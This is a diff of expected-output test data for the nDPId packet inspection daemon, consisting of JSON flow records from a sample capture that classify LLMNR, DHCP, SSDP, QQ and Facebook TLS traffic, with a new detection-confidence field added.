-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
